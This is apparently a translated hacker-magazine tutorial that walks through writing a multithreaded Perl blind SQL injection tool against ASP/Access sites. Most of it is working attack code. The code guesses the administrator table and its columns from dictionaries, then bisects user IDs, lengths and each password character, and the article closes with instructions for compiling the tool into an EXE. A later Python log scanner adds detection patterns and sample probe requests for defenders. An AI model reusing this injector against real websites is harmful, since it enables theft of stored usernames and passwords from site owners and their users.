Speaking of SQL injection tools: the doll's DVTXT.PL, the "Smell" injector, and NBSI from the CSC/NB Alliance, everyone has used them, right?
Start with the ancestor, DVTXT.PL. I don't know how many times it has been modified; it was written for one system with assorted SQL injection holes, and every time "Black Defense" runs an article of the form "** has a SQL injection vulnerability", somebody dusts it off, changes a few field names, and another ** killer tool is unearthed. As for the "Smell" injector, I have used it only reluctantly: although it is multi-threaded, that does not make up for a bad algorithm. It cracks by dictionary, so it is slow, and it cannot crack Chinese double-byte characters at all. NBSI has improved the cracking algorithm but forgot about multi-threading, and when guessing table names and column names it shares one big dictionary, which is a plain waste of time. Put the two together and you would have something, but neither ships source code (visual development tools, and I can only use VB; I have no idea what language the authors used, and even if it were VB, nobody is willing to release the source). Helpless... I had to answer the chairman's call and do the job myself!
The program simply turns the manual process into an automatic one, so first recall the steps of a manual injection guess: 1. find the injection point -> 2. construct the SQL query -> 3. submit the URL -> 4. judge from the page the browser returns whether the query was true or false -> 5. correct the SQL query -> 6. repeat 3, 4 and 5 N times until the information stored in the database is recovered.
Translated into program terms: 1. enter the URL with the SQL injection vulnerability ($url) -> 2. extract the host ($host), path ($path) and port ($port) -> 3. construct the SQL query and append it to the URL ($url) -> 4. submit the URL to the target host with IO::Socket -> 5. match the returned page against the characteristic string ($info) that tells a true query from a false one; on a match move on to guessing the next target value, otherwise repeat 3, 4 and 5.
The overall flow of the guessing is as follows:
User information table -> username column -> password column -> ID column -> smallest user ID -> username length -> password length -> username -> password
That is a bit brief, but these things are well known; for more detail see the SQL injection special in issue No. 5 of "hacking line". Theory done; everybody is itching, the blade is drawn...
Let's go!
One. Extract the host ($host), path ($path) and port ($port) from the URL
I also remember the doll's DVTXT.PL and its cumbersome usage: dvtxt.pl
Copying each part of the URL into place was extremely inconvenient. In fact, Perl's powerful regular expressions solve it. First observe a few URLs: http://www.hemon.tk/show.asp?id=957,
http://www.hemon.tk:1314/show.asp?id=957,
http://www.hemon.tk/article/show.asp?id=957. From the phenomenon to the essence, the rule emerges: (http://)host(:port)/path, where each part in parentheses appears 0 or 1 times.
The regular expression is therefore:
code:
# $url holds the URL the user entered; $port defaults to 80 when the URL gives none
$port = 80;
if ($url =~ /(http:\/\/)?(.*?)\/(.*)/)
{
    $host = $2;
    $path = '/'.$3;
    if ($host =~ /(.*):(.*)/)
    {
        $host = $1;
        $port = $2;
    }
}
In $url =~ /(http:\/\/)?(.*?)\/(.*)/, first the ?: it matches the preceding group 0 or 1 times, so a URL entered without the leading "http://" still works. The host ($host) is matched with (.*?) rather than (.*) because Perl is greedy by default: (.*) would swallow as many characters as possible (up to the last '/'), so without this limit a URL such as http://www.hemon.tk/article/show.asp?id=957 would give $host = www.hemon.tk/article instead of the www.hemon.tk we want.
Two. The IO::Socket submit function
After that effort it is time for a return: quickly use the host ($host), path ($path) and port ($port) to write the submit function:
code:
use IO::Socket;

sub connect
{
    # $path1 holds the injected suffix appended to the path; the request is plain HTTP/1.0
    $req = "GET $path$path1 HTTP/1.0\r\n".
           "Host: $host\r\n".
           "Referer: $host\r\n".
           "Cookie: \r\n\r\n";
    my $connection = IO::Socket::INET->new(Proto    => "tcp",
                                           PeerAddr => $host,
                                           PeerPort => $port) || die "Sorry! Could not connect to $host\n";
    print $connection $req;
    my @res = <$connection>;   # whole response, one line per element
    close $connection;
    return @res;
}
The connect subroutine returns the response in the array @res.
Three. Guess the user information table
SQL query used: 0<>(select count(*) from table)
Now the real cracking begins. There is no shortcut: read the table names stored in a dictionary and try them one at a time; as soon as the characteristic string matches, exit the while loop. There are two kinds of dictionary, an array inside the script or a text file. Since the Perl script will be compiled into an EXE, I use a text dictionary file so that new table names can be added later without recompiling:
code:
open(my $tabinput, '<', "table.txt") or die "can't open file!\n";
while (my $input = <$tabinput>)
{
    chomp $input;                 # chomp separately, so a last line without a newline is still tried
    next unless length $input;
    my $sql = "0<>(select%20count(*)%20from%20$input)";
    $path1 = "%20and%20$sql";
    @res = &connect;
    if ("@res" =~ /$info/)        # $info: the characteristic string of a "true" page
    {
        $table_user = $input;
        print "The table of userinfo is: $table_user\n";
        last;
    }
}
close($tabinput);
Four. Guess the column names
SQL query used: exists(select col_name from table)
This step works like the table-name guess. Once we have the table name we split into three roads and go straight for the username column ($field_user), the password column ($field_pass) and the ID column ($field_id). Since we are dividing our forces, we have to use multithreading. Multithreading in Perl, huh, haven't tried it yet?
To prepare for the multithreaded work, first write the guessing subroutine. We still use a text dictionary file; here the file name is passed in as the only parameter:
code:
sub field_input
{
    my $field;
    open(my $fieinput, '<', $_[0]) or die "can't open file!\n";
    while (my $input = <$fieinput>)
    {
        chomp $input;
        next unless length $input;
        my $sql = "exists%20(select%20$input%20from%20$table_user)";
        $path1 = "%20and%20$sql";
        my @res = &connect;
        if ("@res" =~ /$info/)
        {
            $field = $input;
            print "\t-$field-";
            last;
        }
    }
    close($fieinput);
    return $field;    # undef when nothing in the dictionary matched
}
Five. Speeding up with Perl multithreading
So, of course, it is time to learn multithreading in Perl!!! You may be daunted, thinking it is something grand. Huh, the 80/20 Swiss army knife rule applies here too: we only need to learn two functions and our crash course is over:
$thread = threads->create(function, list)
Creates a thread held in $thread that runs the subroutine/function (function), with list as the subroutine's parameters; new can be used in place of create.
$thread->join
Waits for the thread to finish running. Once it has finished, join() returns the value returned by the subroutine/function.
That's all!
Is it really that simple? Yes: these two things are all our revolution needs!!!
See the ActivePerl help documentation for details: Perl/html/lib/threads.html.
5, 4, 3, 2, 1, ignition!!!
code:
use threads;
$thread1 = threads->create("field_input", "field_username.txt");
$thread2 = threads->create("field_input", "field_password.txt");
$thread3 = threads->create("field_input", "field_id.txt");
Collect the returns:
code:
$field_username = $thread1->join();
$field_password = $thread2->join();
$field_id       = $thread3->join();
Three threads at once, then join; a perfect landing, 10 points!!!
Six. Guessing technique
Even with several horses, the cart is not yet rolling. Let's study the guessing technique. Look at the tasks still waiting for us: smallest user ID -> username length -> password length -> username -> password.
The ID is a natural number, the length len($field) is a number, and the ASCII code of each username or password character is a number too. Ever played the JavaScript number-guessing game? A number within 100, and why do they give you only 7 tries? Because 2^7 = 128; in other words, for any number below 128 you need at most 7 guesses. So for the thousands and tens of thousands in Li Wei's show, how many guesses? 2^13 = 8192, 2^14 = 16384; do you still want the prize?!
To make it clearer, guess a number within 8, say 5; the steps are:
? < 4   n
? < 6   y   4+2
? < 5   n   6-1
? = 5
Three tries. Start from the midpoint (4), then each step adds or subtracts half of the previous step (2, 1). These 2^n values are fixed, so to spare the CPU from recomputing them, and to match the shrinking ranges of the guesses, I prepared four dictionaries:
code:
@dic1 = (128, 64, 32, 16, 8, 4, 2, 1);   # smallest user ID
@dic2 = (16, 8, 4, 2, 1);                # username, password length
@dic3 = (64, 32, 16, 8, 4, 2, 1);        # English characters
@dic4 = (16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1);   # Chinese characters
The algorithm function is as follows:
sub crack
{
    my (@dic) = @_;
    my $sql = pop(@dic);    # the SQL statement travels as the last element of the list
    my $i = 0;
    my $op = 1;             # direction of the next step: +1 go up, -1 go down
    my $crack = 0;          # current guess
    foreach my $pass (@dic)
    {
        print ">";
        $i++;
        $crack += $op * $pass;
        $path1 = "%20and%20$crack<($sql)";
        my @res = &connect;
        if ("@res" =~ /$info/)
        {
            # "true" page: the real value is above the guess
            $op = 1;
            if ($i == @dic)     # last step and still above: the value is guess+1
            {
                $crack++;
            }
        }
        else
        {
            $op = -1;
        }
    }
    return $crack;
}
$sql = "select%20min($field_id)%20from%20$table_user";
$id = &crack(@dic1, "$sql");
Pass the SQL injection statement and the matching dictionary array, and crack!!!
When one parameter is an array, the subroutine can only assign it to a single array variable, my (@dic) = @_, not my (@dic, $sql) = @_; in the latter form $sql would always be empty! A scalar and an array can still be passed together: $sql simply becomes the last element of @dic. pop(@dic) removes that last element ($sql) from the list and returns it, leaving a @dic of pure numbers.
Strike while the iron is hot: get the username and password lengths, and don't forget the threads:
code:
$sql = "select%20len($field_username)%20from%20$table_user%20where%20$field_id=$id";
my $thread4 = threads->create("crack", @dic2, $sql);
$sql = "select%20len($field_password)%20from%20$table_user%20where%20$field_id=$id";
my $thread5 = threads->create("crack", @dic2, $sql);
$userlen = $thread4->join();
$passlen = $thread5->join();
Seven. The last battle: attacking the field values
SQL query used: select abs(asc(mid($field_username,$locat,1)))
Guessing under MS-SQL is not discussed here. One could say MS-SQL needs no guessing at all: construct the conditions well enough and the error message displays the data directly.
ACCESS guessing: first determine whether the ASCII code value is greater than zero. If it is, pass @dic3 to the crack function, otherwise @dic4! Once the function returns a value there are two ways to turn it into a character: chr($asc) or pack('C*', $asc). For Chinese characters the old way was: open the calculator, select scientific mode, convert to hex, read off the four digits, and edit them into the character with UltraEdit, haha... never again! First sprintf("%x", $asc) does the calculator's hex conversion (don't forget to pull out the last four digits with a regular expression, otherwise the character turns into two spaces), then pack("H*", $str) does UltraEdit's packing job:
code:
sub asc
{
    my $asc = $_[0];
    my $str;
    if ($asc < 256)
    {
        $str = pack('C*', $asc);    # single-byte English character
    }
    else
    {
        # Access returned a negative code for the double-byte character and crack got its abs();
        # restore the sign so the hex form ends in the two character bytes, then keep those last four digits
        $asc *= -1;
        $str = sprintf("%x", $asc);
        if ($str =~ /(.{4})$/i)
        {
            $str = $1;
        }
        $str = pack("H*", $str);
    }
    return $str;
}
Everything is ready except the east wind. Taking only the password value as an example, one crack thread is started per character:
code:
for (my $locat = 1; $locat <= $passlen; $locat++)
{
    # sign check: a negative code means a double-byte (Chinese) character
    $sql = "select%20asc(mid($field_password,$locat,1))%20from%20$table_user%20where%20$field_id=$id";
    $path1 = "%20and%200>($sql)";
    my @res = &connect;
    if ("@res" =~ /$info/)
    {
        $sql = "select%20abs(asc(mid($field_password,$locat,1)))%20from%20$table_user%20where%20$field_id=$id";
        $password[$locat] = threads->create("crack", @dic4, $sql);
    }
    else
    {
        $password[$locat] = threads->create("crack", @dic3, $sql);
    }
}
Then wait patiently for these children to come home:
code:
for (my $locat = 1; $locat <= $passlen; $locat++)
{
    $password[$locat] = $password[$locat]->join();   # the numeric code; &asc turns it into a character
}
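Seen from the defending side, every request this tool sends has a recognisable shape in the web server's access log. The following Python script is an added example, not part of the article or its tool: it URL-decodes the request path of each log line and labels the four probe shapes used above (table-name probe, column-name probe, sign check on asc(mid(...)), and the numeric bisection step); the log lines, IP addresses and table/column names in it are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The four request shapes the injector sends, matched against the URL-decoded,
# lower-cased request path so that %20 encoding and letter case do not matter.
PROBE_SHAPES = [
    ("table-name probe",  re.compile(r"\band\s+0\s*<>\s*\(\s*select\s+count\(\*\)\s+from\s+\w+")),
    ("column-name probe", re.compile(r"\band\s+exists\s*\(\s*select\s+\w+\s+from\s+\w+")),
    ("char sign check",   re.compile(r"\band\s+0\s*>\s*\(\s*select\s+asc\(mid\(")),
    ("bisection step",    re.compile(r"\band\s+\d+\s*<\s*\(\s*select\s+(?:min|len|abs)\(")),
]
# Common/combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+"')

# Constructed sample lines (not real traffic); 10.0.0.9 plays the injector.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jul/2004:12:00:01 +0800] "GET /show.asp?id=957 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [09/Jul/2004:12:00:02 +0800] "GET /show.asp?id=957%20and%200<>(select%20count(*)%20from%20admin) HTTP/1.0" 200 5120 "www.example.test" "-"
10.0.0.9 - - [09/Jul/2004:12:00:02 +0800] "GET /show.asp?id=957%20and%20exists%20(select%20username%20from%20admin) HTTP/1.0" 200 5120 "www.example.test" "-"
10.0.0.9 - - [09/Jul/2004:12:00:03 +0800] "GET /show.asp?id=957%20and%20128<(select%20min(id)%20from%20admin) HTTP/1.0" 200 3000 "www.example.test" "-"
10.0.0.9 - - [09/Jul/2004:12:00:03 +0800] "GET /show.asp?id=957%20and%200>(select%20asc(mid(password,1,1))%20from%20admin%20where%20id=1) HTTP/1.0" 200 3000 "www.example.test" "-"
10.0.0.9 - - [09/Jul/2004:12:00:04 +0800] "GET /show.asp?id=957%20and%2064<(select%20abs(asc(mid(password,1,1)))%20from%20admin%20where%20id=1) HTTP/1.0" 200 5120 "www.example.test" "-"
10.0.0.5 - - [09/Jul/2004:12:00:05 +0800] "GET /article/show.asp?id=958 HTTP/1.1" 200 5200 "-" "Mozilla/4.0"
"""

def classify_request(path):
    """Return the probe label for a raw request path, or None when no shape matches."""
    decoded = unquote(path).lower()
    for label, rx in PROBE_SHAPES:
        if rx.search(decoded):
            return label
    return None

def scan_log(text):
    """Return (ip, label, decoded_path) for every line whose request path matches a probe shape."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (label := classify_request(m.group("path"))):
            hits.append((m.group("ip"), label, unquote(m.group("path"))))
    return hits

def probes_per_source(hits):
    """Probe lines per client IP; bisecting a single field already costs the injector dozens of requests."""
    return Counter(ip for ip, _, _ in hits)
```

A burst of these shapes from one source, each differing only in the leading number, is the bisection described above and is worth alerting on even when every response is a 200.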
I won't say more about the display details; let's rush to compile the EXE. Go!
Eight. Compiling Perl to an EXE
Go to the Perl2exe home page
http://www.indigostar.com/perl2exe.htm and download the latest Perl2exe for Win32 (8.40 at the time of writing). Unpack it and enter the unpacked directory at the CMD command line. To avoid the annoying ad banner, register the software first: code:
D:\Hemon\Software>perl2exe -register
Perl2exe v8.40 Copyright (C) 1997-2004 Indigostar Software
Please enter your registration key, or press enter to cancel
Enter my registration code:
Hemon: Hemon: 20040709, 36713
After the registration is successful:
Registered
At the same time a registration file named Perl2exe.key is created in the program directory and can be moved!
Compile the .pl:
code:
D:\Hemon\Software>perl2exe si.pl
Perl2exe v8.40 Copyright (C) 1997-2004 Indigostar Software
Registered to Hemon: Hemon: 20040709, ENT VERSION
Converting 'Si.pl' to Si.exe
A multi-threaded Perl injector that supports Chinese cracking is born!!!
On speed: it saves about half the time, which is still far from what I expected. The unfair part is that "the desire for speed is not reached", so I provide two versions (thr.pl / sig.pl); on websites with slow network speed, huh... you know, better to switch to the single-threaded one, which is more stable.
Anyway, the code is in your hands; I'm not afraid you'll change it: improve the stability, add a few functions, let it support PHP+MySQL, ASP+MSSQL and so on...
One sentence: the power of the network! Support open source code!